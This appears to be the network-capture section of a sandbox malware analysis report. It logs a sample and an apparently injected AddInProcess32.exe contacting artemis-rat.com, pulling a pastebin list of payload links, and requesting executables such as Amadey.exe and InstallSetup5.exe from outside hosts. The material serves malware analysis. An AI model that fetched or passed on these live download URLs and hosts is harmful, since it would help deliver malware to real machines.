Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>
Mar 11, 2024 03:30:58.540462017 CET | 55 | OUT | GET /files/Amadey.exe HTTP/1.1
Host: 15.204.49.148
Mar 11, 2024 03:30:58.739192963 CET | 484 | IN | HTTP/1.1 404 Not Found
Date: Mon, 11 Mar 2024 02:30:57 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Content-Length: 299
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2236 | 192.168.2.5 | 55612 | 15.204.49.148 | 80 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:58.347779989 CET | 55 | OUT | GET /files/Silent.exe HTTP/1.1
Host: 15.204.49.148
Mar 11, 2024 03:30:58.546372890 CET | 484 | IN | HTTP/1.1 404 Not Found
Date: Mon, 11 Mar 2024 02:30:56 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Content-Length: 299
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2237 | 192.168.2.5 | 55610 | 107.167.110.211 | 80 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:58.369354010 CET | 111 | OUT | GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
Host: net.geo.opera.com
Mar 11, 2024 03:30:58.585905075 CET | 424 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 11 Mar 2024 02:30:58 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2238 | 192.168.2.5 | 55616 | 107.167.110.211 | 80 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:58.383063078 CET | 111 | OUT | GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
Host: net.geo.opera.com
Mar 11, 2024 03:30:58.598359108 CET | 424 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 11 Mar 2024 02:30:58 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2239 | 192.168.2.5 | 55628 | 15.204.49.148 | 80 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:59.628715992 CET | 55 | OUT | GET /files/Amadey.exe HTTP/1.1
Host: 15.204.49.148
Mar 11, 2024 03:30:59.851151943 CET | 484 | IN | HTTP/1.1 404 Not Found
Date: Mon, 11 Mar 2024 02:30:58 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Content-Length: 299
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2240 | 192.168.2.5 | 55627 | 107.167.110.211 | 80 | 44264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:59.628834009 CET | 111 | OUT | GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
Host: net.geo.opera.com
Mar 11, 2024 03:30:59.856308937 CET | 424 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 11 Mar 2024 02:30:59 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2241 | 192.168.2.5 | 55629 | 15.204.49.148 | 80 | 44264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:59.649651051 CET | 55 | OUT | GET /files/Silent.exe HTTP/1.1
Host: 15.204.49.148
Mar 11, 2024 03:30:59.852037907 CET | 484 | IN | HTTP/1.1 404 Not Found
Date: Mon, 11 Mar 2024 02:30:58 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Content-Length: 299
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2242 | 192.168.2.5 | 55634 | 107.167.110.211 | 80 | 44264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:31:00.536478996 CET | 111 | OUT | GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
Host: net.geo.opera.com
Mar 11, 2024 03:31:00.768817902 CET | 424 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 11 Mar 2024 02:31:00 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2243 | 192.168.2.5 | 55635 | 15.204.49.148 | 80 | 44264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:31:00.791949987 CET | 55 | OUT | GET /files/Amadey.exe HTTP/1.1
Host: 15.204.49.148
Mar 11, 2024 03:31:01.021440983 CET | 484 | IN | HTTP/1.1 404 Not Found
Date: Mon, 11 Mar 2024 02:30:59 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Content-Length: 299
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2244 | 192.168.2.5 | 55642 | 185.172.128.126 | 80 | 44264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:31:03.661124945 CET | 58 | OUT | GET /InstallSetup5.exe HTTP/1.1
Host: 185.172.128.126
Mar 11, 2024 03:31:03.969909906 CET | 1286 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:31:03 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Mon, 11 Mar 2024 02:30:02 GMT
ETag: "1ca8e4-6135951a2b6e0"
Accept-Ranges: bytes
Content-Length: 1878244
Content-Type: application/x-msdos-program


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49708        140.82.112.4    443               3876  C:\Users\user\Desktop\dl7WL77rkA.exe

Timestamp                Bytes transferred  Direction  Data
2024-03-11 02:30:35 UTC  101                OUT        GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1
    Host: github.com
    Connection: Keep-Alive
2024-03-11 02:30:36 UTC  506                IN         HTTP/1.1 200 OK
    Server: GitHub.com
    Date: Mon, 11 Mar 2024 02:30:35 GMT
    Content-Type: text/html; charset=utf-8
    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    ETag: W/"0f276cf0553609c098b42ab0c59c3999"
    Cache-Control: max-age=0, private, must-revalidate
    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    X-Frame-Options: deny
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Referrer-Policy: no-referrer-when-downgrade


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.5  51394        104.100.78.158  443

Timestamp                Bytes transferred  Direction  Data
2024-03-11 02:30:39 UTC  161                OUT        HEAD /fs/windows/config.json HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    User-Agent: Microsoft BITS/7.8
    Host: fs.microsoft.com
2024-03-11 02:30:39 UTC  466                IN         HTTP/1.1 200 OK
    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
    Content-Type: application/octet-stream
    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
    Server: ECAcc (sac/250E)
    X-CID: 11
    X-Ms-ApiVersion: Distribute 1.2
    X-Ms-Region: prod-eus-z1
    Cache-Control: public, max-age=60961
    Date: Mon, 11 Mar 2024 02:30:39 GMT
    Connection: close
    X-CID: 2


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.5  51964        104.100.78.158  443

Timestamp                Bytes transferred  Direction  Data
2024-03-11 02:30:40 UTC  239                OUT        GET /fs/windows/config.json HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
    Range: bytes=0-2147483646
    User-Agent: Microsoft BITS/7.8
    Host: fs.microsoft.com
2024-03-11 02:30:40 UTC  530                IN         HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
    ApiVersion: Distribute 1.1
    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
    X-Azure-Ref: 0Fz4RYwAAAACZW8dCTzveR7lI76J6Z2l5U0pDRURHRTA1MTgAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
    Cache-Control: public, max-age=60939
    Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Length: 55
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            X-CID: 2
                                                                                                                                                                                                                                                            2024-03-11 02:30:40 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 53550 | 222.255.238.159 | 443 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:44 UTC | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
2024-03-11 02:30:44 UTC | 192 | IN | HTTP/1.1 500 Internal Server Error
Date: Mon, 11 Mar 2024 02:30:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 613
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-03-11 02:30:44 UTC | 613 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 55130 | 104.21.54.158 | 443 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:46 UTC | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
2024-03-11 02:30:46 UTC | 161 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:46 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
2024-03-11 02:30:46 UTC | 155 | IN | Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
5 | 192.168.2.5 | 55554 | 104.20.68.143 | 443
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:52 UTC | 74 | OUT | GET /raw/E0rY26ni HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
2024-03-11 02:30:53 UTC | 388 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:53 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: MISS
Last-Modified: Mon, 11 Mar 2024 02:30:53 GMT
Server: cloudflare
CF-RAY: 862820056e120ad7-LAS
2024-03-11 02:30:53 UTC | 800 | IN | Data Ascii: 319http://185.172.128.126/InstallSetup5.exehttps://bitbucket.org/j-upsps/microsoft_network1/downloads/a02.exehttps://shipofdestiny.com/baf14778c246e15550645e30ba78ce1c.exehttps://sty.ink/ppg8xhttps://namemail.org/6779d89b7a368f4f3f340b50a9d18d71
2024-03-11 02:30:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6192.168.2.555562172.67.169.8944344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:53 UTC | 65 | OUT | GET /RNWPd.exe HTTP/1.1
Host: yip.su
Connection: Keep-Alive
2024-03-11 02:30:54 UTC | 898 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
memory: 0.36199188232421875
expires: Mon, 11 Mar 2024 02:30:53 +0000
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
Cache-Control: max-age=14400
CF-Cache-Status: EXPIRED
Last-Modified: Sun, 10 Mar 2024 13:56:44 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5lluPna3WPbvKwVifapt0MRIa1opUa7OzY9%2BsISIG%2BwbDXmgizIdYAc6HHHYb4O8QhD5auQfixTLegob9idrj2hoyMl18J9aNIXokonwhO35AdGGaO14Xi4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 86282007597709fb-LAS
alt-svc: h3=":443"; ma=86400
2024-03-11 02:30:54 UTC | 471 | IN | Data Ascii: 1d16<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-03-11 02:30:54 UTC | 1369 | IN | Data Ascii: r" content="7 days" /><meta name="keywords" content="" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property="og:image" content="https://cdn.iplogger.or
2024-03-11 02:30:54 UTC | 1369 | IN | Data Ascii: ne}#loader>span{height:16px;width:16px;border-radius:50%;background-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;ani
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC1369INData Raw: 72 69 70 74 3e 0a 09 76 61 72 20 5f 70 3b 0a 09 69 66 28 6e 61 76 69 67 61 74 6f 72 26 26 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 26 26 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                            Data Ascii: ript>var _p;if(navigator&&navigator.userAgentData&&navigator.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC1369INData Raw: 6f 72 65 20 70 72 6f 63 65 73 73 69 6e 67 2e 2e 2e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 5f 63 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79
                                                                                                                                                                                                                                                            Data Ascii: ore processing...</div></div> <script> _c();</script><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC1369INData Raw: 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f 6d 61 69 6e 22 3e 79 69 70 2e 73 75 3c 2f 64 69
                                                                                                                                                                                                                                                            Data Ascii: .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="domain">yip.su</di
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC138INData Raw: 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: ute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 55560 | 20.114.59.183 | 443
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:54 UTC | 306 | OUT
GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ukzbu+vH1LRx6rZ&MD=mpFDpHgu HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Host: slscr.update.microsoft.com
2024-03-11 02:30:54 UTC | 560 | IN
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/octet-stream
Expires: -1
Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
MS-CorrelationId: c5e92f46-11df-45b0-8927-e0dc98294ecd
MS-RequestId: c5322595-e92e-4ed5-80ca-b1601a11cc38
MS-CV: teMwaG+Go0aV5YWu.0
X-Microsoft-SLSClientCache: 2880
Content-Disposition: attachment; filename=environment.cab
X-Content-Type-Options: nosniff
Date: Mon, 11 Mar 2024 02:30:53 GMT
Connection: close
Content-Length: 24490
2024-03-11 02:30:54 UTC | 15824 | IN
2024-03-11 02:30:54 UTC | 8666 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 55569 | 172.67.200.219 | 443 | 44264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:54 UTC | 62 | OUT
GET /ppg8x HTTP/1.1
Host: sty.ink
Connection: Keep-Alive
2024-03-11 02:30:54 UTC | 1188 | IN
HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: no-cache, private
Set-Cookie: XSRF-TOKEN=eyJpdiI6ImMvaFlYb2dlSm8rRG1YVnZ3RVRrMXc9PSIsInZhbHVlIjoiN2xUd0lGak44bkdYQ1pLb3pRVTUzVk10QVdDYVlEdHo1NHhMTUpUNkNIdkhvbHdVczhTZjBoZmJKdmZMTW5VZldzUHRGSFhSS0RkL2dnUURMVkRxUGZCczNLUXN2SklvSTIwN1hxL2VTajhmR2ZnYkdFT1JSMFEycjRoT0hnZTMiLCJtYWMiOiIxMDU0MTA1ZTRlN2M2YjVmZWNiZDQzNWIyODQzZTg0ODYwN2NjMTg2YWJhNWU4NzI2NDEyOWY3ZTdkZDg4OTExIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:54 GMT; Max-Age=7200; path=/; secure
set-cookie: shortiny_session=eyJpdiI6ImZReHEwZUtaZzlPUUR4NjZlRms4ZXc9PSIsInZhbHVlIjoibzliZlpwOEE0YkVmdDk3U2ZCQVNkODkwdys1NGt3aTRkVTdvU3ZLZjdCREZ0TGxuQm96eDRLeXlCWDFXUmlCdmFqVFpFVVBFbUV6cm84NWtoUURKU0ttZnJjUzBvd0YyNk01aHR2WGRZeS9qMkg1Y0hRTG0rSjdaamk0Y0dRa0oiLCJtYWMiOiJiYzAzOWQ1ZmNmNzc2YjhiODg2MDM4NjQ0YzZlOGMxMGMxYTIwOGQ0YWY3YjU2ODU4NjdmMjQxN2I1MjRjOGUzIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:54 GMT; Max-Age=7200; path=/; httponly
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=15768000
CF-Cache-Status: DYNAMIC
2024-03-11 02:30:54 UTC | 397 | IN
Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZLloS%2FM4aEDgrnUVcRd8exQ3N1E3M%2B5mb7EOKmIytw%2FeMEng1eFdDr1QLw4dXxiv4R31M6n3pfcAVexk%2FGturAUeSeRC9FwbUkxTkcs4KvQb8di9Of%2FNgfp6"}],"group":"cf-nel","max_age":604800}NEL: {"
2024-03-11 02:30:54 UTC | 1369 | IN
Data Ascii: e1c<!DOCTYPE html><html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> ... CSRF Token --> <meta name="csrf-token" content="
2024-03-11 02:30:54 UTC | 1369 | IN
Data Ascii: <a href="https://shortiny.com" class="btn btn-primary">Go back</a> </div> </div> </div> </div></div> <footer id="footer" class="footer bg-base-0 d-print-none"> <div class="container
2024-03-11 02:30:54 UTC | 881 | IN
Data Ascii: </div> </div> </div> <div class="fixed-bottom pointer-events-none"> <div class="d-flex justify-content-center align-items-center"> <div class="border-0 mt-0 mr-3 mb-3 ml-3 p-2 rounded cookie-banner
2024-03-11 02:30:54 UTC | 5 | IN
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 55570 | 172.67.200.219 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:54 UTC | 62 | OUT | GET /ppg8x HTTP/1.1
                                                                                                                                                                                                                                                            Host: sty.ink
                                                                                                                                                                                                                                                            Connection: Keep-Alive
2024-03-11 02:30:55 UTC | 1188 | IN | HTTP/1.1 200 OK
